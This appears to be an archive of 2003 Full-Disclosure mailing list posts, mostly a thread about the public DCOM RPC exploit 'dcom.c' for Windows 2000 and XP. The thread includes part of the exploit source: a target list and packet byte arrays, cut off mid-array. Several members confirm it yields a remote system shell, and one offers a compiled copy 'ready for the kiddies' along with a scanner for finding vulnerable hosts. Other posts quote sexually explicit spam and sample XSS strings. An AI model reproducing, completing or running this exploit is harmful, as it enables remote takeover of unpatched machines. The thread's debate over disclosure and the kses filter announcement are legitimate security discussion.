> 
> 
> I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
> code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
> virtually no work to do in order to write a worm that exploits this.
> 
> 
> 
> Personally, I'm tempted to set up my firewall to NAT incoming requests on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know this is the
> full-disclosure list, but working exploit code for an issue this huge is taking
> it a bit far, especially less than 2 weeks after the advisory comes out.
> 
> Cheers, fellas.  When the worm comes out, I'll be thinking of you.
> 
> Chris
> 
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Paul M. Hirsch]

On Sat, Jul 26, 2003 at 07:34:17PM -0500, Elvar wrote:
> Anyone gotten this to compile in FreeBSD 4.8-stable?
> 
> <[EMAIL PROTECTED]:elvar>gcc -o dcom dcom.c
> dcom.c:25: error.h: No such file or directory

Change line 10 to:

#include 

Compiles fine on OpenBSD-current/i386.  It failed to exploit
my W2Ksp3 and XPsp1 boxes/victims.

-Paul

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Len Rose]

Disclaimer: I'm not supposed to have an opinion about anything
other than how the list functions but I'm weak and unable to
resist this one.

Hi Chris,

I don't feel that your position is valid. Once the vulnerability was
announced then it was inevitable. I'm surprised that you feel that
security by obscurity is a valid stance. Even those who have released
"harmless" scanners have in fact aided those who would be writing such
malware anyway since all they have to do is sniff the wire if they're
searching for correct methodology. 


Chris Paget wrote:

> 
> I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
> code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
> virtually no work to do in order to write a worm that exploits this.
> 

Only those who mistakenly believe that hiding information from the masses
will stop those who have the knowledge and intent to cause harm could feel
this way.

> Personally, I'm tempted to set up my firewall to NAT incoming requests on port
> 135 to either www.metasploit.com or www.xfocus.org.  I know this is the
> full-disclosure list, but working exploit code for an issue this huge is taking
> it a bit far, especially less than 2 weeks after the advisory comes out.

It wouldn't matter if it were 2 months.

> Cheers, fellas.  When the worm comes out, I'll be thinking of you.

Think of the joke sold to millions of people masquerading as an operating system 
coded by unemployed vms programmers, and visual basic "experts" instead.

Len

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[christopher neitzert]

Works brilliantly now.  ...totaly forgot that i filter 135 among other
things on 802.11 segments.

this exploit is pure evil...
ironic that it was announced by [EMAIL PROTECTED]

chris
On Sat, 2003-07-26 at 15:37, christopher neitzert wrote:
> I've managed to compile it under gcc 3.2.2 without error, yet 
> It doesn't seem to do anything but hang-itself against XP-Professional
> hosts, as I haven't a 2k box available to test against.
> 
> chris
> 
> 
> 
> On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> > >03-026 working exploit
> > 
> > Anyone had any luck compiling any of these exploits? I continue to recieve 
> > compiler warnings whether I use gcc or a dgc.
> > 
> > -- Justin Shin
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html



signature.asc
Description: This is a digitally signed message part

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[CompSecGeek]

Compiled perfectly on my RH9 box.  The exploit failed to work against 
three W2K SP4 boxes though.  Going to try my XP hosts next.

--CSG



On Sat, 26 Jul 2003 at 17:25 -0400 Justin Shin was heard to utter:

JS> >03-026 working exploit
JS> 
JS> Anyone had any luck compiling any of these exploits? I continue to recieve 
compiler warnings whether I use gcc or a dgc.
JS> 


-- 
This message has been scanned for viruses and
dangerous content by MailScanner/Sophos on 
mail.digitalvoodoo.org and is believed to be clean.
--

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Elvar]

Anyone gotten this to compile in FreeBSD 4.8-stable?

<[EMAIL PROTECTED]:elvar>gcc -o dcom dcom.c
dcom.c:25: error.h: No such file or directory
<[EMAIL PROTECTED]:elvar>gcc -v
Using builtin specs.
gcc version 2.95.4 20020320 [FreeBSD]



Kind regards,
Elvar

- Original Message - 
From: "gml" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; "'Justin Shin'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 6:12 PM
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> This exploit works exceptionally well.  Frighteningly well.
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of christopher
> neitzert
> Sent: Saturday, July 26, 2003 3:38 PM
> To: Justin Shin
> Cc: [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)
>
> I've managed to compile it under gcc 3.2.2 without error, yet
> It doesn't seem to do anything but hang-itself against XP-Professional
> hosts, as I haven't a 2k box available to test against.
>
> chris
>
>
>
> On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> > >03-026 working exploit
> >
> > Anyone had any luck compiling any of these exploits? I continue to
recieve
> compiler warnings whether I use gcc or a dgc.
> >
> > -- Justin Shin
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> -- 
> Christopher Neitzert http://www.neitzert.com/~chris
> chris<>neitzert{dot}com - GPG Key ID: 7DCC491B
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Chris Paget]

I'd just like to thank FlashSky, Benjurry, and H D Moore for releasing this
code.  Really guys, sterling job.  Now the skript kiddies and VXers have got
virtually no work to do in order to write a worm that exploits this.



Personally, I'm tempted to set up my firewall to NAT incoming requests on port
135 to either www.metasploit.com or www.xfocus.org.  I know this is the
full-disclosure list, but working exploit code for an issue this huge is taking
it a bit far, especially less than 2 weeks after the advisory comes out.

Cheers, fellas.  When the worm comes out, I'll be thinking of you.

Chris



On Sat, 26 Jul 2003, [EMAIL PROTECTED] wrote:

> 03-026 working exploit
>
>
> -
>
> This email was sent using FREE Catholic Online Webmail.
> http://webmail.catholic.org/
>
>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[w g]

there is a first version compiled and ready for the kiddies on my site http://illmob.org also have eeye's RPC scanner to check for vulnerable boxes. also waiting for a newer version supposedly from xfocus that has a few fixes etc... ill let ya know
 
illwillmorning_wood <[EMAIL PROTECTED]> wrote:

there is a compiled version at http://illmob.org ... ( 'tanks illwill )w00d___Full-Disclosure - We believe in it.Charter: http://lists.netsys.com/full-disclosure-charter.html
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[gml]

This exploit works exceptionally well.  Frighteningly well.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of christopher
neitzert
Sent: Saturday, July 26, 2003 3:38 PM
To: Justin Shin
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

I've managed to compile it under gcc 3.2.2 without error, yet 
It doesn't seem to do anything but hang-itself against XP-Professional
hosts, as I haven't a 2k box available to test against.

chris



On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits? I continue to recieve
compiler warnings whether I use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-- 
Christopher Neitzert http://www.neitzert.com/~chris
chris<>neitzert{dot}com - GPG Key ID: 7DCC491B

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[morning_wood]

there is a compiled version at http://illmob.org ... ( 'tanks illwill )

w00d
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[hicks]

Confirmed working an windows 2000 SP4 compiled under Red Hat 9 with gcc
gives a remote system shell. cheers



- Original Message - 
From: "Justin Shin" <[EMAIL PROTECTED]>
To: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
Sent: Saturday, July 26, 2003 5:25 PM
Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)


> >03-026 working exploit
>
> Anyone had any luck compiling any of these exploits? I continue to recieve
compiler warnings whether I use gcc or a dgc.
>
> -- Justin Shin
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Javier Liendo]

hello

dcom.c compiled fine (gcc version 3.2 20020903 (Red
Hat Linux 8.0 3.2-7)) and worked as advertised...

saludos

javier


--- Justin Shin <[EMAIL PROTECTED]> wrote:
> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits?
> I continue to recieve compiler warnings whether I
> use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter:
http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[christopher neitzert]

I've managed to compile it under gcc 3.2.2 without error, yet 
It doesn't seem to do anything but hang-itself against XP-Professional
hosts, as I haven't a 2k box available to test against.

chris



On Sat, 2003-07-26 at 17:25, Justin Shin wrote:
> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits? I continue to recieve compiler 
> warnings whether I use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-- 
Christopher Neitzert http://www.neitzert.com/~chris
chris<>neitzert{dot}com - GPG Key ID: 7DCC491B


signature.asc
Description: This is a digitally signed message part

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Jason Witty]

I compiled it perfectly using RedHat 9 and stock GCC (v.3.2.2).  Also 
compiled using Cygwin with GCC 3.2, with just a minor tweak to remove the 
include for , as my distro didn't have that, and the exploit 
doesn't seem to really need it.

Jason

At 05:25 PM 7/26/2003 -0400, you wrote:
>03-026 working exploit

Anyone had any luck compiling any of these exploits? I continue to recieve 
compiler warnings whether I use gcc or a dgc.

-- Justin Shin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Ole Myhre]

Justin Shin wrote:

03-026 working exploit


Anyone had any luck compiling any of these exploits? I continue to recieve compiler warnings whether I use gcc or a dgc
Compiled perfect here. And the exploit works perfect as well.

--
Ole Myhre
Tlf: +47 55 91 61 00
Mob: +47 45 21 27 60
"If you don't have any humor, you don't take life seriously enough."

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[tcpdumb]

Compiled without any problems

System Info:

Linux beast 2.6.0-test1 #31338 Wed Jul 23 05:08:59 CEST 2003 i686 unknown

gcc --version   :   2.95.4

Maybe a hint:

-It's always useful having masses of development-stuff aboardlike libc6 
and several versions of gcc or other Compilers.

-The OS I compile an exploit on depends on the Exploit itself. 
 Never seen an OpenSSH-Exploit running on a Linux. Therefore I
 got a Computer with OpenBSD. Windows-Exploits like SMBnuke
 work on all unices (Even OSF-1, Solaris - cool thing).

Haven't tried the DCOM-Exploit yet but this is just a question of time. Next to me 
there is a Computer running Win2000 Server. I'll try it as soon as my girlfriend 
stopped working at it (maybe sooner *hehe*).

Have a lot of fun!


On Sat, 26 Jul 2003 17:25:50 -0400
"Justin Shin" <[EMAIL PROTECTED]> wrote:

> >03-026 working exploit
> 
> Anyone had any luck compiling any of these exploits? I continue to recieve compiler 
> warnings whether I use gcc or a dgc.
> 
> -- Justin Shin
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)

[Justin Shin]

>03-026 working exploit

Anyone had any luck compiling any of these exploits? I continue to recieve compiler 
warnings whether I use gcc or a dgc.

-- Justin Shin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] morning_wood should stop posting xss

[Jeremy Gaddis]

On Fri, 2003-07-25 at 15:38, morning_wood wrote:
>   you are too narrow minded to even speak, broaden your horizons and
> accecpt all posibilities Ron. You are showing your ability to not
> comprehend the processes and theroetical possibilities... i feel way  sorry
> for you.. go read more books Ron.. im sure you will learn even more crap
> that keeps you in your little hole...
> quit poping out of it mmmkay..
>  you might actually see the horizon...
> 
> "the sky is falling!!!" poor Chicken Little

Tools -> Options -> Spelling -> "Always check spelling before
sending".

Enable that.

j.

-- 
Jeremy L. Gaddis   <[EMAIL PROTECTED]>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] DCOM RPC exploit (dcom.c)

[fulldisclosure]

03-026 working exploit


-

This email was sent using FREE Catholic Online Webmail.
http://webmail.catholic.org/



/*
  DCOM RPC Overflow Discovered by LSD
   -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
   
  Based on FlashSky/Benjurry's Code
   -> http://www.xfocus.org/documents/200307/2.html
   
  Written by H D Moore 
   -> http://www.metasploit.com/
   
  - Usage: ./dcom  
  - Targets:
  -  0Windows 2000 SP0 (english)
  -  1Windows 2000 SP1 (english)
  -  2Windows 2000 SP2 (english)
  -  3Windows 2000 SP3 (english)
  -  4Windows 2000 SP4 (english)
  -  5Windows XP SP0 (english)
  -  6Windows XP SP1 (english)
 
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0

Re: [Full-Disclosure] Advances in Spamming Techniques

[Jacob Joensen]

dear snot,

Would you mind taking your gay spam whining somewhere else?

Jacob

- Original Message - 
From: "security snot" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, July 25, 2003 11:38 PM
Subject: [Full-Disclosure] Advances in Spamming Techniques


> I responded to an earlier post, from a respectable security personality
> known as the dotslasher ([EMAIL PROTECTED]) with a bit of sarcasm.  I
> don't remember the incident 100%, but it was regarding a piece of spam
> that he had recieved, that had a fake gpg signature attached to it.
>
> Recently I've also observed certain advances on bypassing spam filters,
> which are being actively exploited out in the wild.  Since this is
> apparently a serious security-related matter (unsolicited email) I thought
> I might share the body of this email with this list, so that everyone can
> know what to watch out for in the future, and begin to develop better
> antispam security filters.
>
> 
> We meet h0t y0ung guys (18-24) all the time who want to get   fiuic ked,
> to feel a hard c0ck in their   aiss   for the very first time, and we've
> made it our mission in life to help as many of these hot   tiwinks   as
> we can. They're a horny bunch and they spend a fair amount of time
> covered in   sipunk, f1uicking  and suiciking c0ck like champions.
>
> One of our "students":
>
> Name: William Age: 18 Comments: 3 c0cks are better than 1!
> When we met William he was so shy that we teamed him up with 2 of our
> best educators... Jeff and Steven had sweet Willie suiciking  c0ck like
> an old pro in no time.
> Contents: Full-length downloadable harid core video plus 150 pics.
>
>
> Let's go?
> 
>
> Normally, spam filters will score on phrases such as "hot young guys" and
> "hard core" (and other variations, such as "hardcore"); words like
> "fucked", "cock", "sucking", etc.  In this bit of unsolicited email that I
> recieved after making a post to alt.gay.* (sorry, there may be minors
> reading the list and I wouldn't want them to know where they can be
> exposed to such adult conversations - here I am, exercising my right to
> limited free speech), we can observe that those filters are being bypassed
> by altering the spelling of the words and emulating "l33tspeak".
>
> Providing better regular expressions to mail filters, to account for this
> type of attack, is probably the best idea.  What we're seeing here is a
> spinoff of polymorphic shellcode and attack mechanisms (originally
> designed to bypass Intrusion Detection Systems) being applied to more
> tangible areas of technology.  It is interesting, however, to see
> technology evolve in this way.
>
> For those of you who don't understand how this could be a security-related
> matter, imagine trying to attack an "internal" mailserver on a network,
> where mail is forwarded from a spam-filtering proxy.  Normally, the
> filters on the mail proxy would drop your message in transit, before
> reaching the vulnerable mailserver.  By applying stealthlike operations on
> our spam, we're able to bypass the filters and have our malicious email
> attack the victim.
>
> I'd like to thank KF for his assistance in preparing this post, and for
> his many intelligence discussions on this mailing list.  I'd also like to
> thank his colleague dug-h0 y0ng (expl0it1t13z) for a concise and accurate
> paper on exploiting format string vulnerabilities; his paper addressed
> many things that the five-hundred other papers on the subject managed to
> do correctly.
>
> I plan on arranging an academic study into the subject of bypassing spam
> filters, and how this affects the stability of the internet.  If anyone is
> interested in working on this with me, please drop me a message.
>
> Thanks,
> -snot
>
> ---
> "Whitehat by day, booger at night - I'm the security snot."
> - CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
> ---
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] http://www.chiefofficer.com/particle.php?t=38

[Georgi Guninski]

Looks like "Chief Officer is a private, international community of leaders" does 
not like much the “OIS”sh*t: http://www.chiefofficer.com/particle.php?t=38

georgi

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ANNOUNCE] kses 0.2.0

[Ulf Harnhammar]

kses 0.2.0
==


* INTRODUCTION *


kses is an HTML/XHTML filter written in PHP. It removes all unwanted HTML
elements and attributes, no matter how malformed HTML input you give it. It
also does several checks on attribute values. kses can be used to avoid
Cross-Site Scripting (XSS), Buffer Overflows and Denial of Service attacks,
among other things.

The program is released under the terms of the GNU General Public License. You
should look into what that means, before using kses in your programs.


* FEATURES *


Some of kses' current features are:

* It will only allow the HTML elements and attributes that it was explicitly
told to allow.

* Element and attribute names are case-insensitive (a href vs A HREF).

* It will understand and process whitespace correctly.

* Attribute values can be surrounded with quotes, apostrophes or nothing.

* It will accept attributes with just names and no values (selected).

! It will accept XHTML's closing " /" marks. [new in 0.2.0]

* Attribute values that are surrounded with nothing will get quotes to avoid
producing non-W3C conforming HTML
(http://sourceforge.net/projects/kses> works but isn't valid HTML).

* It handles lots of types of malformed HTML, by interpreting the existing code
the best it can and then rebuilding new code from it. That's a better approach
than trying to process existing code, as you're bound to forget about some
weird special case somewhere. It handles problems like never-ending quotes and
tags gracefully.

* It will remove additional "<" and ">" characters that people may try to sneak
in somewhere.

! It supports checking attribute values for maximum length and maximum value,
to protect against Buffer Overflows and Denial of Service attacks against WWW
clients and various servers. You can stop  from
having too high values for width and height, for instance. [new in 0.2.0]

! It has got a system for white listing URL protocols. You can say that
attribute values may only start with http:, https:, ftp: and gopher:, but no
other URL protocols (javascript:, java:, about:, telnet:..). The functions that
do this work handle whitespace, upper/lower case, HTML entities
("javascript:") and repeated entries ("javascript:javascript:alert(57)").
It also normalizes HTML entities as a nice side effect. [new in 0.2.0]

! It removes Netscape 4's JavaScript entities ("&{alert(57)};"). [new in 0.2.0]

! It handles NULL bytes. [new in 0.2.0]


* DOWNLOAD LOCATION AND MAILING LIST *


If you want to download kses or subscribe to its kses-general mailing list, you
should visit its homepage at  http://sourceforge.net/projects/kses .

Security audits, bug reports and patches are highly appreciated, so don't
hesitate to get in touch.


// Ulf Harnhammar, London/Stockholm, July 2003
   metaur at users dot sourceforge dot net

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html